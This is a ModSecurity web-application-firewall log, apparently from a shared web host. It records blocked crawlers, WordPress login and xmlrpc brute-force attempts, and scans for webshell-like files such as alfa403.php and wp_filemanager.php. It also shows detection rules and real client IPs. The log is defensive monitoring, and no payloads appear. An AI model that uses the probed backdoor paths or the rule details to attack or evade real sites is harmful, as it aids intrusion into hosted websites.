[Tue May 26 14:28:04.077280 2026] [security2:error] [pid 610693:tid 610777] [remote 47.128.116.67:64762] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "anujtradingco.com"] [uri "/business/register/org/landing"] [unique_id "ahVgmzvNO3hpmlY6M8RmGQAAElM"]
[Tue May 26 14:28:04.202372 2026] [security2:error] [pid 606909:tid 607125] [client 74.249.212.138:19747] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/alfa403.php"] [unique_id "ahVgnF0yRtX9qA7aVUVshAAAANs"]
[Tue May 26 14:28:04.202538 2026] [security2:error] [pid 606909:tid 607125] [client 74.249.212.138:19747] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/alfa403.php"] [unique_id "ahVgnF0yRtX9qA7aVUVshAAAANs"]
[Tue May 26 14:28:04.540218 2026] [security2:error] [pid 606909:tid 606948] [remote 95.216.117.13:41920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVgnF0yRtX9qA7aVUVsiAAA8iY"]
[Tue May 26 14:28:04.569611 2026] [security2:error] [pid 606909:tid 607084] [client 74.249.212.138:12598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/test11.php"] [unique_id "ahVgnF0yRtX9qA7aVUVsjQAAALI"]
[Tue May 26 14:28:04.569733 2026] [security2:error] [pid 606909:tid 607084] [client 74.249.212.138:12598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/test11.php"] [unique_id "ahVgnF0yRtX9qA7aVUVsjQAAALI"]
[Tue May 26 14:28:04.865474 2026] [security2:error] [pid 606909:tid 607040] [client 85.208.96.206:44862] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahVgnF0yRtX9qA7aVUVsjwAAAIY"]
[Tue May 26 14:28:04.865642 2026] [security2:error] [pid 606909:tid 607040] [client 85.208.96.206:44862] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/3/"] [unique_id "ahVgnF0yRtX9qA7aVUVsjwAAAIY"]
[Tue May 26 14:28:05.110445 2026] [security2:error] [pid 610693:tid 610782] [remote 112.196.0.228:37546] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 228.0.196.112.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVgnDvNO3hpmlY6M8RmJQAAL1g"]
[Tue May 26 14:28:05.335411 2026] [security2:error] [pid 606909:tid 606984] [remote 51.79.229.9:37608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.229.79.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVgnV0yRtX9qA7aVUVsmAAA4Eo"]
[Tue May 26 14:28:05.774913 2026] [security2:error] [pid 606909:tid 607050] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgnV0yRtX9qA7aVUVsmwAAAJA"]
[Tue May 26 14:28:05.851078 2026] [security2:error] [pid 606909:tid 607090] [client 74.249.212.138:4073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/koala.php"] [unique_id "ahVgnV0yRtX9qA7aVUVsnwAAALg"]
[Tue May 26 14:28:05.851168 2026] [security2:error] [pid 606909:tid 607090] [client 74.249.212.138:4073] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in.svijaykumar.in"] [uri "/koala.php"] [unique_id "ahVgnV0yRtX9qA7aVUVsnwAAALg"]
[Tue May 26 14:28:06.801459 2026] [security2:error] [pid 610693:tid 610836] [client 78.47.173.76:58822] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVgnjvNO3hpmlY6M8RmOQAAAA0"], referer: https://thegoodsporting.com
[Tue May 26 14:28:07.693002 2026] [security2:error] [pid 610693:tid 610889] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgnzvNO3hpmlY6M8RmPgAAAEI"]
[Tue May 26 14:28:08.999682 2026] [security2:error] [pid 610693:tid 610791] [remote 152.53.111.131:60602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVgoDvNO3hpmlY6M8RmYQAAL2E"]
[Tue May 26 14:28:09.283056 2026] [security2:error] [pid 610693:tid 610839] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgoDvNO3hpmlY6M8RmZAAAABA"]
[Tue May 26 14:28:09.323114 2026] [security2:error] [pid 610693:tid 610925] [client 114.119.155.83:30895] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVgoTvNO3hpmlY6M8RmaQAAAGY"], referer: http://glorodavionics.com/index.php?route=product/product&product_id=94
[Tue May 26 14:28:10.847884 2026] [security2:error] [pid 610693:tid 610842] [client 144.124.227.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVgojvNO3hpmlY6M8RmfwAAABM"], referer: http://www.anujtradingco.com/top-deejay-headphones/?unapproved=1080029&moderation-hash=0e87fce109a830c284db19e55e399fb4
[Tue May 26 14:28:11.492142 2026] [security2:error] [pid 610693:tid 610897] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgozvNO3hpmlY6M8RmjQAAAEo"]
[Tue May 26 14:28:11.499924 2026] [security2:error] [pid 606909:tid 607161] [client 144.124.227.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVgo10yRtX9qA7aVUVs0AAAAP8"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1080029&moderation-hash=0e87fce109a830c284db19e55e399fb4
[Tue May 26 14:28:11.824122 2026] [security2:error] [pid 610693:tid 610914] [client 14.161.140.254:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgozvNO3hpmlY6M8RmkwAAAFs"]
[Tue May 26 14:28:13.940989 2026] [security2:error] [pid 610693:tid 610804] [remote 170.187.230.30:45564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.230.187.170.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVgpTvNO3hpmlY6M8RmxQAAQm4"]
[Tue May 26 14:28:13.990539 2026] [security2:error] [pid 610693:tid 610857] [client 202.141.83.254:53818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgpTvNO3hpmlY6M8RmxgAAACI"]
[Tue May 26 14:28:13.990744 2026] [security2:error] [pid 610693:tid 610857] [client 202.141.83.254:53818] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgpTvNO3hpmlY6M8RmxgAAACI"]
[Tue May 26 14:28:14.039175 2026] [security2:error] [pid 610693:tid 610944] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgpTvNO3hpmlY6M8RmwwAAAHk"]
[Tue May 26 14:28:14.893285 2026] [security2:error] [pid 610693:tid 610871] [client 154.161.32.97:46537] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVgpjvNO3hpmlY6M8Rm0wAAADA"]
[Tue May 26 14:28:16.265551 2026] [security2:error] [pid 606909:tid 607158] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgp10yRtX9qA7aVUVs9AAAAPw"]
[Tue May 26 14:28:18.289641 2026] [security2:error] [pid 606909:tid 607060] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgqV0yRtX9qA7aVUVtAgAAAJo"]
[Tue May 26 14:28:20.237913 2026] [security2:error] [pid 606909:tid 607143] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgq10yRtX9qA7aVUVtFwAAAO0"]
[Tue May 26 14:28:22.317051 2026] [security2:error] [pid 610693:tid 610834] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgrTvNO3hpmlY6M8RnWAAAAAs"]
[Tue May 26 14:28:24.273027 2026] [security2:error] [pid 610693:tid 610891] [client 202.141.83.254:53938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgsDvNO3hpmlY6M8RndQAAAEQ"]
[Tue May 26 14:28:24.273169 2026] [security2:error] [pid 610693:tid 610891] [client 202.141.83.254:53938] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgsDvNO3hpmlY6M8RndQAAAEQ"]
[Tue May 26 14:28:24.345765 2026] [security2:error] [pid 610693:tid 610824] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgrzvNO3hpmlY6M8RncAAAAAE"]
[Tue May 26 14:28:24.760024 2026] [security2:error] [pid 610693:tid 610800] [remote 57.141.2.28:21795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVgsDvNO3hpmlY6M8RnggAAGGo"]
[Tue May 26 14:28:26.401041 2026] [security2:error] [pid 610693:tid 610876] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgsTvNO3hpmlY6M8RnjQAAADU"]
[Tue May 26 14:28:28.220445 2026] [security2:error] [pid 610693:tid 610949] [client 114.119.155.111:52173] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/wp-content/uploads/the-city-school-400x284.png"] [unique_id "ahVgtDvNO3hpmlY6M8RnuwAAAH4"], referer: https://www.jhonweb.com/project_category/web-corporativa
[Tue May 26 14:28:28.386563 2026] [security2:error] [pid 606909:tid 607079] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgs10yRtX9qA7aVUVtYgAAAK0"]
[Tue May 26 14:28:30.191574 2026] [security2:error] [pid 606909:tid 607158] [client 114.119.134.204:21807] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "mahehealthcare.com"] [uri "/wp-content/uploads/arrow-right.png"] [unique_id "ahVgtl0yRtX9qA7aVUVtfQAAAPw"], referer: https://mahehealthcare.com/wp-content/uploads/arrow-right.png
[Tue May 26 14:28:30.394867 2026] [security2:error] [pid 610693:tid 610883] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgtTvNO3hpmlY6M8Rn1gAAADw"]
[Tue May 26 14:28:33.105961 2026] [security2:error] [pid 610693:tid 610906] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVguDvNO3hpmlY6M8RoEAAAAFM"]
[Tue May 26 14:28:34.453748 2026] [security2:error] [pid 610693:tid 610835] [client 113.170.241.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgujvNO3hpmlY6M8RoKwAAAAw"]
[Tue May 26 14:28:34.551072 2026] [security2:error] [pid 610693:tid 610912] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgujvNO3hpmlY6M8RoLgAAAFk"]
[Tue May 26 14:28:34.659657 2026] [security2:error] [pid 610693:tid 610871] [client 202.141.83.254:19943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgujvNO3hpmlY6M8RoOAAAADA"]
[Tue May 26 14:28:34.659788 2026] [security2:error] [pid 610693:tid 610871] [client 202.141.83.254:19943] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgujvNO3hpmlY6M8RoOAAAADA"]
[Tue May 26 14:28:36.164562 2026] [security2:error] [pid 610693:tid 610900] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVguzvNO3hpmlY6M8RoRgAAAE0"]
[Tue May 26 14:28:38.719724 2026] [security2:error] [pid 606909:tid 607094] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgvl0yRtX9qA7aVUVt3AAAALw"]
[Tue May 26 14:28:39.376158 2026] [security2:error] [pid 606909:tid 606940] [remote 216.185.214.209:51688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.214.185.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVgv10yRtX9qA7aVUVt5wAApR4"]
[Tue May 26 14:28:40.890891 2026] [security2:error] [pid 606909:tid 607147] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgwF0yRtX9qA7aVUVuAQAAAPE"]
[Tue May 26 14:28:43.003471 2026] [security2:error] [pid 610693:tid 610943] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgwjvNO3hpmlY6M8RoegAAAHg"]
[Tue May 26 14:28:44.719644 2026] [security2:error] [pid 610693:tid 610904] [client 20.195.199.65:58064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVgxDvNO3hpmlY6M8RoqgAAAFE"]
[Tue May 26 14:28:44.719828 2026] [security2:error] [pid 610693:tid 610904] [client 20.195.199.65:58064] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVgxDvNO3hpmlY6M8RoqgAAAFE"]
[Tue May 26 14:28:44.940231 2026] [security2:error] [pid 610693:tid 610828] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVgxDvNO3hpmlY6M8RoqQAAAAU"]
[Tue May 26 14:28:45.084443 2026] [security2:error] [pid 606909:tid 607142] [client 20.195.199.65:40823] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/x.php"] [unique_id "ahVgxV0yRtX9qA7aVUVuQwAAAOw"]
[Tue May 26 14:28:45.084552 2026] [security2:error] [pid 606909:tid 607142] [client 20.195.199.65:40823] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/x.php"] [unique_id "ahVgxV0yRtX9qA7aVUVuQwAAAOw"]
[Tue May 26 14:28:45.113949 2026] [security2:error] [pid 610693:tid 610930] [client 202.141.83.254:19727] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgxTvNO3hpmlY6M8RorQAAAGs"]
[Tue May 26 14:28:45.114063 2026] [security2:error] [pid 610693:tid 610930] [client 202.141.83.254:19727] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVgxTvNO3hpmlY6M8RorQAAAGs"]
[Tue May 26 14:28:45.454122 2026] [security2:error] [pid 606909:tid 607041] [client 20.195.199.65:48988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/201.php"] [unique_id "ahVgxV0yRtX9qA7aVUVuSgAAAIc"]
[Tue May 26 14:28:45.454229 2026] [security2:error] [pid 606909:tid 607041] [client 20.195.199.65:48988] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/201.php"] [unique_id "ahVgxV0yRtX9qA7aVUVuSgAAAIc"]
[Tue May 26 14:28:45.886139 2026] [security2:error] [pid 610693:tid 610900] [client 20.195.199.65:23988] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.obinnawrites.com"] [uri "/ops.php"] [unique_id "ahVgxTvNO3hpmlY6M8RotgAAAE0"]
[Tue May 26 14:28:45.886240 2026] [security2:error] [pid 610693:tid 610900] [client 20.195.199.65:23988] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.obinnawrites.com"] [uri "/ops.php"] [unique_id "ahVgxTvNO3hpmlY6M8RotgAAAE0"]
[Tue May 26 14:28:46.134400 2026] [security2:error] [pid 610693:tid 610910] [client 154.161.32.97:46538] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVgxTvNO3hpmlY6M8RotwAAAFc"]
